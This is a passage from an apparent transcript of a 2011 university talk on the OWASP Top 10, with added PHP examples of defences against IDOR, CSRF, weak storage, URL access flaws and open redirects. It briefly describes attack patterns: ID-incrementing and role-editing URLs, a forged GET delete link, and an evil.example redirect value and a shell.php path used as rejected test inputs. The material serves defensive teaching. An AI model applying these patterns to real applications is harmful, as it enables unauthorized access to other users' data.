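
session_save_path() and the ini_set() calls must run before session_start(); once a session is active they are ignored. The Secure flag only helps if every page that starts a session is itself served over HTTPS, which is why the "Use HTTPS" rule above is not optional.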
81. INSECURE DIRECT OBJECT REFERENCES
82. INSECURE DIRECT OBJECT REFERENCES
WHAT IS IT?
The application exposes a reference to an internal object (a database key, a file name) and lets the user supply it, so users without proper credentials can view secure data
Do any users have only partial access to certain types of system data?
83-84. INSECURE DIRECT OBJECT REFERENCES
TYPICAL IMPACT
Technical Impact: MODERATE
• Depends on the value of the secure data
• One flaw can compromise all data referenced by the insecure object: every row of the table, every file in the directory
85. INSECURE DIRECT OBJECT REFERENCES
HOW IS IT EXPLOITED?
• User clicks link "My Account"
• User accesses "My Account" page at URL: http://mybank.com/account/2055
• User increments the parameter in the URL: http://mybank.com/account/2056
• User is granted access (the application looked the account up by ID and never asked whether it belongs to the logged-in user)
86-87. INSECURE DIRECT OBJECT REFERENCES
HOW TO PREVENT IT?
• Use an array map to make URL parameters indirect references: the user sees a per-session key, the real ID stays on the server, and the map only contains the objects that user may reach
• Use switch() to test parameters against the list of valid values and reject everything else
• Either way, still check authorization where the data is read; hiding the ID alone is not access control
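The two techniques from the prevention slide, worked through against the bank example. This is an added example, not the slides' code. The in-memory ACCOUNTS table and the owner IDs are constructed sample data standing in for a database, and the parameter names ref and action are assumptions.

```php
<?php
// Added example: indirect object references via an array map, a switch() whitelist,
// and the ownership check that must still happen at the point of use.
// ACCOUNTS is constructed sample data standing in for the accounts table.
declare(strict_types=1);

const ACCOUNTS = [
    2055 => ['owner' => 17, 'balance' => 1200.00],
    2056 => ['owner' => 42, 'balance' => 98000.00],
    2057 => ['owner' => 17, 'balance' => 300.00],
];

// Build the map once per login: opaque key => real id, for this user's accounts only.
// Links then carry /account?ref=<key>; the real id never leaves the server and
// there is nothing for the user to increment.
function buildAccountReferences(int $userId): array
{
    $map = [];
    foreach (ACCOUNTS as $id => $account) {
        if ($account['owner'] === $userId) {
            $map[bin2hex(random_bytes(8))] = $id;
        }
    }
    $_SESSION['account_refs'] = $map;
    return $map;
}

// Resolve a key from the URL back to a real id; unknown keys resolve to nothing.
function resolveAccountReference(array $refs, string $key): ?int
{
    return $refs[$key] ?? null;
}

// The map is a convenience, not the authorization check: verify ownership again
// where the record is actually read, so a stale or leaked key still cannot cross users.
function loadOwnAccount(int $userId, array $refs, string $key): ?array
{
    $id = resolveAccountReference($refs, $key);
    if ($id === null || !isset(ACCOUNTS[$id]) || ACCOUNTS[$id]['owner'] !== $userId) {
        return null;
    }
    return ACCOUNTS[$id];
}

// switch() as a whitelist for ?action=...: a value outside the list is an error,
// not something to pass on to a query, a file name or an include.
function validAction(string $action): string
{
    switch ($action) {
        case 'view':
        case 'statement':
        case 'transfer':
            return $action;
        default:
            throw new InvalidArgumentException('unknown action');
    }
}

// Request handling sketch (after startSecureSession() and login):
//   $refs    = $_SESSION['account_refs'] ?? [];
//   $account = loadOwnAccount((int)$_SESSION['user_id'], $refs, (string)($_GET['ref'] ?? ''));
//   if ($account === null) { http_response_code(404); exit; }
//   $action  = validAction((string)($_GET['action'] ?? 'view'));
```

Returning 404 rather than 403 for a key that is not in the user's map avoids confirming that the object exists at all.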
88. CROSS SITE REQUEST FORGERY (CSRF)
89-90. CROSS SITE REQUEST FORGERY (CSRF)
WHAT IS IT?
The victim's browser is tricked into issuing a command to a vulnerable web application
• HTTP is "stateless": the browser attaches its credentials (the session cookie) to every request, whichever page caused it
• If the user visits another website while still authenticated...
• Any request that site makes the browser send back to the application carries the session cookie and is treated as authentic
91-96. CROSS SITE REQUEST FORGERY (CSRF)
TYPICAL IMPACT
Technical Impact: MODERATE
What if a hacker could steer your mouse and get you to click on links in your online banking application? What could they make you do?
• Make transactions?
• Close accounts?
• Change password?
97-100. CROSS SITE REQUEST FORGERY (CSRF)
HOW IS IT EXPLOITED?
A vulnerable web application allows destructive actions (INSERT, UPDATE, DELETE) via $_GET:
  http://mydomain.com/file.php?action=delete&id=12345
An <img> tag or a link on any page the victim visits is enough to trigger it.
Destructive actions are executed with minimal or no verification of the origin of the request:
  HTTP POST => http://mydomain.com/file.php?action=delete
Switching to POST is only marginally more difficult to forge: a hidden, auto-submitting form on the attacker's page does it.
101-104. CROSS SITE REQUEST FORGERY (CSRF)
HOW TO PREVENT IT?
A few easy ways... (these shrink the window of exposure; none of them closes it)
• Invalidate user sessions quickly
• Encourage users to log out (they don't)
• Don't implement "Remember Me" features
105-108. CROSS SITE REQUEST FORGERY (CSRF)
HOW TO PREVENT IT?
Implement a CSRF token
• Add a secret token, one the browser will not submit automatically the way it submits cookies, to ALL sensitive requests
• Verify the token exists and matches the expected value before executing the request
• Generate the token and store it in the user's session
• Use the token in the POST form (a hidden field)
• Validate it when the POST is received
Source: http://shiflett.org/articles/cross-site-request-forgeries
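The three steps above (generate and store, embed in the form, validate on POST) in one file. This is an added example following the pattern in Shiflett's article, not the article's own listing and not the slides' code; it assumes PHP 7.0 or later and that session handling has already been started as shown earlier.

```php
<?php
// Added example: synchronizer token for the delete form from the exploit slide.
// Assumes PHP >= 7.0 and that a session is active before this file runs.
declare(strict_types=1);

session_start();

// One random token per session, created on first use. A token tied to the session
// is something a third-party page cannot read and the browser will not add on its own.
function csrfToken(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Hidden field to drop into every state-changing form.
function csrfField(): string
{
    return '<input type="hidden" name="csrf_token" value="'
        . htmlspecialchars(csrfToken(), ENT_QUOTES, 'UTF-8') . '">';
}

// True only when the submitted token exists and equals the session's token.
// hash_equals() compares in constant time so the token cannot be guessed byte by byte.
function csrfIsValid(array $post): bool
{
    $expected = $_SESSION['csrf_token'] ?? '';
    $given    = $post['csrf_token'] ?? null;
    if ($expected === '' || !is_string($given)) {
        return false;
    }
    return hash_equals($expected, $given);
}

// Destructive actions are POST only; a GET with ?action=delete is ignored entirely.
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    if (!csrfIsValid($_POST)) {
        http_response_code(403);
        exit('Invalid request token');
    }
    $action = $_POST['action'] ?? '';
    $id     = (int)($_POST['id'] ?? 0);
    if ($action === 'delete' && $id > 0) {
        // deleteRecord($id);  // the real work goes here, only after the token check
    }
}
?>
<form method="post" action="/file.php">
  <?= csrfField() ?>
  <input type="hidden" name="action" value="delete">
  <input type="hidden" name="id" value="12345">
  <button type="submit">Delete record 12345</button>
</form>
```

The token is only a secret as long as the page that contains it is not readable cross-site, so this protection still depends on the HTTPS and XSS controls elsewhere in the talk: an XSS bug on the site lets the attacker read the hidden field and forge the request anyway.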
109. SECURITY MISCONFIGURATION
110-111. SECURITY MISCONFIGURATION
WHAT IS IT?
Running web applications on a secure foundation:
• From the operating system up through Apache
• All PHP extensions
• All installed libraries on the server
112-116. SECURITY MISCONFIGURATION
TYPICAL IMPACT
Technical Impact: MODERATE
• Install a backdoor through a missing security patch
• Install malware on the server
• "Root" the server
• All your data is stolen
117. SECURITY MISCONFIGURATION
HOW IS IT EXPLOITED?
[diagram] Source: Dave Wichers OWASP Top 10 Presentation
118-122. SECURITY MISCONFIGURATION
HOW TO PREVENT IT?
SYSTEM LEVEL (how does this fit with KU?)
• Update to the latest application versions
• Install security patches
• Monitor vulnerability lists
APPLICATION LEVEL
• Use the latest available version of PHP
• Update third-party software when updates are available
• Monitor the mailing lists of the software you depend on
123. INSECURE CRYPTOGRAPHIC STORAGE
124-125. INSECURE CRYPTOGRAPHIC STORAGE
WHAT IS IT?
Incorrectly storing and transmitting confidential data, in:
• Database data
• Log files
• Backup files
• Password files
126-127. INSECURE CRYPTOGRAPHIC STORAGE
WHAT IS IT?
What is considered secure data at KU?
• Data protected by FERPA
• Data protected by GLB
• Data subject to PCI (credit or payment card industry) standards
• Data subject to other Federal or state confidentiality laws
• Donor or prospect information
• Passwords and PINs
• Personally Identifiable Information ("PII")
• Personnel data
• Individually identifiable information created and collected by research projects
• Certain research data with National Security implications
• Data subject to protection pursuant to non-disclosure agreements
• Audit working papers
• Data protected by attorney/client privilege
• Email covering topics listed above
THIS LIST IS NOT ALL INCLUSIVE
Source: https://documents.ku.edu/policies/Information_Services/APPENDIX_1_Data_Classif_Policy.htm
128-130. INSECURE CRYPTOGRAPHIC STORAGE
TYPICAL IMPACT
Technical Impact: SEVERE
• Attacker accesses or modifies confidential data
• Intellectual property stolen
• You or KU might get sued
• Makes the organization look bad in the press
Business Impact: SEVERE
High risk of significant financial loss, legal liability, public distrust and harm if this data is disclosed
131. INSECURE CRYPTOGRAPHIC STORAGE
HOW IS IT EXPLOITED?
[diagram] Source: Dave Wichers OWASP Top 10 Presentation
132-136. INSECURE CRYPTOGRAPHIC STORAGE
HOW TO PREVENT IT?
• Identify all sensitive data and all places it is stored
• Don't store private data in public_html
• Don't invent your own encryption algorithm; use the primitives PHP already ships, and hash passwords rather than encrypting them, since a password never needs to be read back
• Don't transmit confidential data over unencrypted means
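What "don't invent your own encryption" looks like in practice, as an added example that is not code from the slides: passwords go through PHP's built-in password_hash(), and data that must be read back (a donor's phone number, say) uses authenticated encryption from the bundled sodium extension. It assumes PHP 7.2 or later and a key file at /etc/myapp/secret.key outside public_html; the demo at the bottom generates a key in memory so it runs without that file.

```php
<?php
// Added example: standard-library primitives instead of a home-grown scheme.
// Assumes PHP >= 7.2 (sodium_* built in). The key path is an illustrative assumption.
declare(strict_types=1);

// Passwords: a slow, salted, one-way hash. Store the result; never the password,
// never a reversible ciphertext, never a bare MD5/SHA1.
function storePassword(string $password): string
{
    return password_hash($password, PASSWORD_DEFAULT);
}

function checkPassword(string $password, string $storedHash): bool
{
    return password_verify($password, $storedHash);
}

// Data that must be decrypted later: secretbox = XSalsa20 + Poly1305, so tampering
// with the stored value is detected instead of silently decrypting to garbage.
function loadKey(string $path = '/etc/myapp/secret.key'): string
{
    $key = @file_get_contents($path);            // 32 raw bytes, file mode 0400
    if ($key === false || strlen($key) !== SODIUM_CRYPTO_SECRETBOX_KEYBYTES) {
        throw new RuntimeException('missing or malformed key file');
    }
    return $key;
}

function encryptField(string $plaintext, string $key): string
{
    $nonce = random_bytes(SODIUM_CRYPTO_SECRETBOX_NONCEBYTES);   // fresh per record
    $box   = sodium_crypto_secretbox($plaintext, $nonce, $key);
    // The nonce is not secret; it is stored alongside the ciphertext.
    return base64_encode($nonce . $box);
}

function decryptField(string $stored, string $key): string
{
    $raw = base64_decode($stored, true);
    if ($raw === false || strlen($raw) <= SODIUM_CRYPTO_SECRETBOX_NONCEBYTES) {
        throw new RuntimeException('corrupt ciphertext');
    }
    $nonce = substr($raw, 0, SODIUM_CRYPTO_SECRETBOX_NONCEBYTES);
    $box   = substr($raw, SODIUM_CRYPTO_SECRETBOX_NONCEBYTES);
    $plain = sodium_crypto_secretbox_open($box, $nonce, $key);
    if ($plain === false) {
        throw new RuntimeException('authentication failed: wrong key or modified data');
    }
    return $plain;
}

// Offline demonstration with an in-memory key (constructed sample values).
function demo(): void
{
    $hash = storePassword('correct horse battery staple');
    assert(checkPassword('correct horse battery staple', $hash));
    assert(!checkPassword('Tr0ub4dor&3', $hash));

    $key    = sodium_crypto_secretbox_keygen();
    $stored = encryptField('785-864-0000', $key);
    assert(decryptField($stored, $key) === '785-864-0000');

    // Flip one byte of the ciphertext: decryption must fail, not return a near miss.
    $tampered = base64_decode($stored, true);
    $tampered[strlen($tampered) - 1] = chr(ord($tampered[strlen($tampered) - 1]) ^ 0x01);
    try {
        decryptField(base64_encode($tampered), $key);
        assert(false, 'tampered ciphertext was accepted');
    } catch (RuntimeException $e) {
        // expected
    }
}
```

The key belongs in a file the web server can read and nobody else can, never in the database next to the ciphertext and never under public_html, which is the same rule as the second bullet above.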
137. FAILURE TO RESTRICT URL ACCESS
138. FAILURE TO RESTRICT URL ACCESS
WHAT IS IT?
Unauthorized users can view private pages; public users could reach your admin functionality simply by requesting its URL
139-140. FAILURE TO RESTRICT URL ACCESS
TYPICAL IMPACT
Technical Impact: MODERATE
• Attackers invoke functions and services they're not authorized for
• Access other users' accounts and data
• Perform privileged actions
141-145. FAILURE TO RESTRICT URL ACCESS
HOW IS IT EXPLOITED?
• User accesses URL http://mydomain.com/user/profile
• User changes the role segment of the URL: http://mydomain.com/manager/profile, http://mydomain.com/admin/profile
Presentation-layer access control (hiding the link from the menu) DOESN'T WORK: the page is still served to anyone who types the URL
Unlinked URLs (http://mydomain.com/you/will/never/find/this/index.html) DON'T WORK either: they get guessed, crawled, and leaked through referrers, browser history and log files
146-148. FAILURE TO RESTRICT URL ACCESS
HOW TO PREVENT IT?
• Check credentials on every page, on the server, before any work is done
• Disallow direct requests to page types that should never be served as pages (e.g. http://mydomain.com/uploads)
• Test it! Log in as each role and request the other roles' URLs
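One way to make "check credentials on every page" a single piece of code rather than a habit, as an added example that is not the slides' code: a rule table keyed by URL prefix, consulted from a file every page requires first. The role names, the /user/, /manager/, /admin/ and /uploads/ layout, and the /login.php path are assumptions taken from the exploit slide; the decision is kept in a pure function so it can be tested against the exact URLs from that slide.

```php
<?php
// Added example: one server-side access check run by every page.
// Roles, URL prefixes and the login path are illustrative assumptions.
declare(strict_types=1);

// Roles allowed under each URL prefix, most specific first.
// An empty list means the path is never served as a page (uploaded files included).
const ACCESS_RULES = [
    '/admin/'    => ['admin'],
    '/manager/'  => ['manager', 'admin'],
    '/user/'     => ['user', 'manager', 'admin'],
    '/uploads/'  => [],
    '/login.php' => ['anonymous', 'user', 'manager', 'admin'],
];

function rolesAllowedFor(string $path): array
{
    foreach (ACCESS_RULES as $prefix => $roles) {
        if (strncmp($path, $prefix, strlen($prefix)) === 0) {
            return $roles;
        }
    }
    return ['user', 'manager', 'admin'];   // anything unlisted needs at least a login
}

// Pure decision: 'ok', 'login', 'forbidden' or 'not_found'. $role is null when nobody
// is logged in. Kept free of header()/exit so it can be exercised from a test.
function accessDecision(string $requestUri, ?string $role): string
{
    $path = parse_url($requestUri, PHP_URL_PATH);
    if (!is_string($path) || $path === '' || strpos($path, '..') !== false) {
        return 'not_found';
    }
    $allowed = rolesAllowedFor($path);
    if ($allowed === []) {
        return 'not_found';
    }
    if ($role === null) {
        return in_array('anonymous', $allowed, true) ? 'ok' : 'login';
    }
    return in_array($role, $allowed, true) ? 'ok' : 'forbidden';
}

// require 'access.php'; at the top of every page, before any output.
function enforceAccess(): void
{
    $role = $_SESSION['role'] ?? null;   // set at login, right after session_regenerate_id()
    switch (accessDecision($_SERVER['REQUEST_URI'] ?? '/', $role)) {
        case 'ok':
            return;
        case 'login':
            header('Location: /login.php', true, 302);
            exit;
        case 'forbidden':
            http_response_code(403);
            exit('Forbidden');
        default:
            http_response_code(404);
            exit('Not found');
    }
}

// The "Test it!" step from the slide, as calls a test file can assert on:
//   accessDecision('/user/profile', 'user');
//   accessDecision('/manager/profile', 'user');
//   accessDecision('/admin/profile', 'user');
//   accessDecision('/admin/profile', null);
//   accessDecision('/uploads/shell.php', 'admin');
```

Because the rule is applied to the request path rather than attached to individual links, the attack on the exploit slide (editing /user/ to /admin/) is answered by the same line of code for every page, and a page that forgets to call enforceAccess() is the only gap left to look for in review.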
149. INSUFFICIENT TRANSPORT LAYER PROTECTION
150-159. INSUFFICIENT TRANSPORT LAYER PROTECTION
WHAT IS IT?
Sending confidential data over unencrypted protocols
• Failure to identify all sensitive data
• Failure to identify all places sensitive data is sent
Between:
• Server and user
• Backend databases
• Colleagues
• Internal communications
160-161. INSUFFICIENT TRANSPORT LAYER PROTECTION
TYPICAL IMPACT
Technical Impact: MODERATE
• Expose users' confidential data
• Account theft
162-174. INSUFFICIENT TRANSPORT LAYER PROTECTION
HOW IS IT EXPLOITED?
Does your application...
• Use confidential data? (see the KU secure-data list on slides 126-127; source: https://documents.ku.edu/policies/Information_Services/APPENDIX_1_Data_Classif_Policy.htm)
• Send it over email?
• Send it to a database?
• Use HTTPS for ALL authentication requests?
Do you...
• Have encrypted email set up between colleagues?
• Use encrypted IM chat between colleagues?
• Store your account passwords in a password safe?
175-179. INSUFFICIENT TRANSPORT LAYER PROTECTION
HOW TO PREVENT IT?
Don't use the KU Email Form to send confidential data. Instead:
1. Build a web form that stores it in a secure database
2. Build a page to download or browse the info
3. Only allow specific users to access it, using Shibboleth
180-182. INSUFFICIENT TRANSPORT LAYER PROTECTION
HOW TO PREVENT IT?
Use secure protocols to transmit and store data
• Ever try to FTP to www2.ku.edu without SFTP? (plain FTP sends your password in the clear)
• Store confidential data in our secure Oracle database
183-184. INSUFFICIENT TRANSPORT LAYER PROTECTION
HOW TO PREVENT IT?
Require HTTPS on all secure pages
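A way to enforce "require HTTPS on all secure pages" from the page itself rather than relying on every link being typed correctly. This is an added example, not the slides' code. CANONICAL_HOST is an assumption (test.ku.edu, from the mixed-content slide) and is used deliberately instead of $_SERVER['HTTP_HOST'], which the client controls; the X-Forwarded-Proto handling is only correct when a trusted TLS-terminating proxy sits in front of PHP, so it is off by default.

```php
<?php
// Added example: refuse to serve a secure page over plain HTTP.
// CANONICAL_HOST is an illustrative assumption; never build the redirect from HTTP_HOST.
declare(strict_types=1);

const CANONICAL_HOST = 'test.ku.edu';

// $server is $_SERVER, passed in so the check can be exercised without a web server.
function isHttps(array $server, bool $behindTrustedProxy = false): bool
{
    if (!empty($server['HTTPS']) && strtolower((string)$server['HTTPS']) !== 'off') {
        return true;
    }
    if ((int)($server['SERVER_PORT'] ?? 0) === 443) {
        return true;
    }
    // Only believe the proxy header when a known proxy strips it from client requests.
    return $behindTrustedProxy
        && strtolower((string)($server['HTTP_X_FORWARDED_PROTO'] ?? '')) === 'https';
}

// The https:// URL to bounce to, or null when the request is already secure.
function httpsRedirectFor(array $server, bool $behindTrustedProxy = false): ?string
{
    if (isHttps($server, $behindTrustedProxy)) {
        return null;
    }
    $path = (string)($server['REQUEST_URI'] ?? '/');
    if ($path === '' || $path[0] !== '/') {      // a client value must not pick the host
        $path = '/';
    }
    return 'https://' . CANONICAL_HOST . $path;
}

// Call first on every secure page: before any output and before session_start(),
// so the session cookie is never issued over the insecure connection.
function requireHttps(): void
{
    $target = httpsRedirectFor($_SERVER);
    if ($target !== null) {
        // Whatever the client already sent in the clear is already exposed; the redirect
        // only stops the response (and the cookie) from going out unencrypted too.
        header('Location: ' . $target, true, 301);
        exit;
    }
    // Ask browsers to use HTTPS for this host for a year, even for typed http:// links.
    header('Strict-Transport-Security: max-age=31536000; includeSubDomains');
}
```

The redirect is a safety net, not the primary control: a login form that was itself loaded over HTTP can be rewritten by the network before the user ever submits it, which is why the slides say every authentication request, not just the POST, must be HTTPS.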
185. INSUFFICIENT TRANSPORT LAYER PROTECTION
HOW TO PREVENT IT?
Set up email encryption between colleagues: http://www.technology.ku.edu/ca/install/
186. INSUFFICIENT TRANSPORT LAYER PROTECTION
HOW TO PREVENT IT?
Set up Off-The-Record chat encryption: http://www.h-i-r.net/2011/01/introduction-to-encrypted-internet-chat.html
187. INSUFFICIENT TRANSPORT LAYER PROTECTION
HOW TO PREVENT IT?
KeePass, free and open-source
• Windows: http://keepass.info/
• Mac: http://www.keepassx.org/
188. UNVALIDATED REDIRECTS AND FORWARDS
189. UNVALIDATED REDIRECTS AND FORWARDS
WHAT IS IT?
URL redirects built by the web application can be exploited if the target is not validated
• The link appears to be a valid URL on your site but carries the attacker's destination as a parameter
• Internal redirects are common
• External redirects are becoming more common
190. UNVALIDATED REDIRECTS AND FORWARDS
TYPICAL IMPACT
Technical Impact: MODERATE
• Install malware
• Phishing site (victims trust the link because it starts with your domain)
• Bypass authorization controls (an internal forward lands on a page the user could not request directly)
191. UNVALIDATED REDIRECTS AND FORWARDS
HOW IS IT EXPLOITED?
[diagram] Source: Dave Wichers OWASP Top 10 Presentation
192-193. UNVALIDATED REDIRECTS AND FORWARDS
HOW TO PREVENT IT?
• Avoid using redirects and forwards as much as possible
• If used, don't build the target from user-input parameters
• If you must use user input, use an array map to whitelist URL parameters: the user supplies a key, the application supplies the URL
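The array-map whitelist from the prevention slide, with a second, stricter check for the one case a map cannot cover (a "return to this page after login" path). Added example, not the slides' code; the parameter names goto and next, the keys, and the target URLs are assumptions.

```php
<?php
// Added example: whitelisting redirect targets. Keys, URLs and parameter names are
// illustrative assumptions.
declare(strict_types=1);

// The only destinations the application will ever put in a Location header.
const REDIRECT_TARGETS = [
    'home'    => '/index.php',
    'account' => '/account/',
    'library' => 'https://lib.ku.edu/',
];

// ?goto=account -> /account/. An unknown or missing key falls back to a fixed page,
// so ?goto=http://evil.example/ can never reach header().
function redirectTargetFor($key): string
{
    if (is_string($key) && array_key_exists($key, REDIRECT_TARGETS)) {
        return REDIRECT_TARGETS[$key];
    }
    return REDIRECT_TARGETS['home'];
}

// When a full path must be accepted (e.g. ?next=/account/), allow only an absolute
// path on this origin. Returns null for anything else; null means "use the map".
function sameOriginPath(string $candidate): ?string
{
    // Exactly one leading slash: browsers treat "//evil.example" and "/\evil.example"
    // as scheme-relative URLs pointing at another host.
    if ($candidate === '' || $candidate[0] !== '/') {
        return null;
    }
    if (isset($candidate[1]) && ($candidate[1] === '/' || $candidate[1] === '\\')) {
        return null;
    }
    // No control characters (header injection) and nothing parse_url reads as a host.
    if (preg_match('/[\x00-\x1F\x7F]/', $candidate)) {
        return null;
    }
    $parts = parse_url($candidate);
    if ($parts === false || isset($parts['scheme']) || isset($parts['host']) || isset($parts['user'])) {
        return null;
    }
    return $candidate;
}

function redirectTo(string $target): void
{
    header('Location: ' . $target, true, 302);
    exit;
}

// On the login page, after a successful login:
//   redirectTo(sameOriginPath((string)($_GET['next'] ?? '')) ?? redirectTargetFor($_GET['goto'] ?? null));
```

The map form is preferable wherever it fits: it validates by construction and there is no parser to get wrong. The sameOriginPath() check exists for the one pattern the map cannot express, and it still refuses anything that names a host, which is the whole of the phishing risk on the impact slide.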
194. Questions?
195. My challenge to you
• Read the OWASP Wiki: http://www.owasp.org
• Review your code: http://www.owasp.org/index.php/Code_Review_Guide and http://www.owasp.org/index.php/OWASP_Testing_Project
196. Sources
OWASP sources:
- OWASP Application Security Verification Standard Project. <http://www.owasp.org/index.php/ASVS>
- OWASP Authentication Cheat Sheet. <http://www.owasp.org/index.php/Authentication_Cheat_Sheet>
- OWASP Code Review Project. <http://www.owasp.org/index.php/Code_Review_Guide>
- OWASP Testing Project. <http://www.owasp.org/index.php/OWASP_Testing_Project>
- OWASP Top 10 - 2010: The Top 10 Most Critical Web Application Security Risks. Dave Wichers, OWASP Board Member. <http://owasptop10.googlecode.com/files/OWASP_Top_10_-_2010%20Presentation.pptx>
- OWASP XSS (Cross Site Scripting) Prevention Cheat Sheet. <http://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet>
Links:
- Setting up encrypted email at KU. <http://www.technology.ku.edu/ca/install/>
- Introduction to Encrypted Internet Chat. <http://www.h-i-r.net/2011/01/introduction-to-encrypted-internet-chat.html>
Software:
- HTMLPurifier <http://htmlpurifier.org/>
- KeePass <http://keepass.info/>
- KeePassX <http://www.keepassx.org/>
- WebScarab <http://www.owasp.org/index.php/Category:OWASP_WebScarab_Project>
Photos:
- http://www.flickr.com/photos/mrbenn/2337943659/
- http://www.flickr.com/photos/12836528@N00/4294660659/
- http://xkcd.com/327/
John Kary | johnkary@ku.edu
Web Development & Interface Design, University of Kansas, Information Technology
January 2011 KU Web Developers Meeting
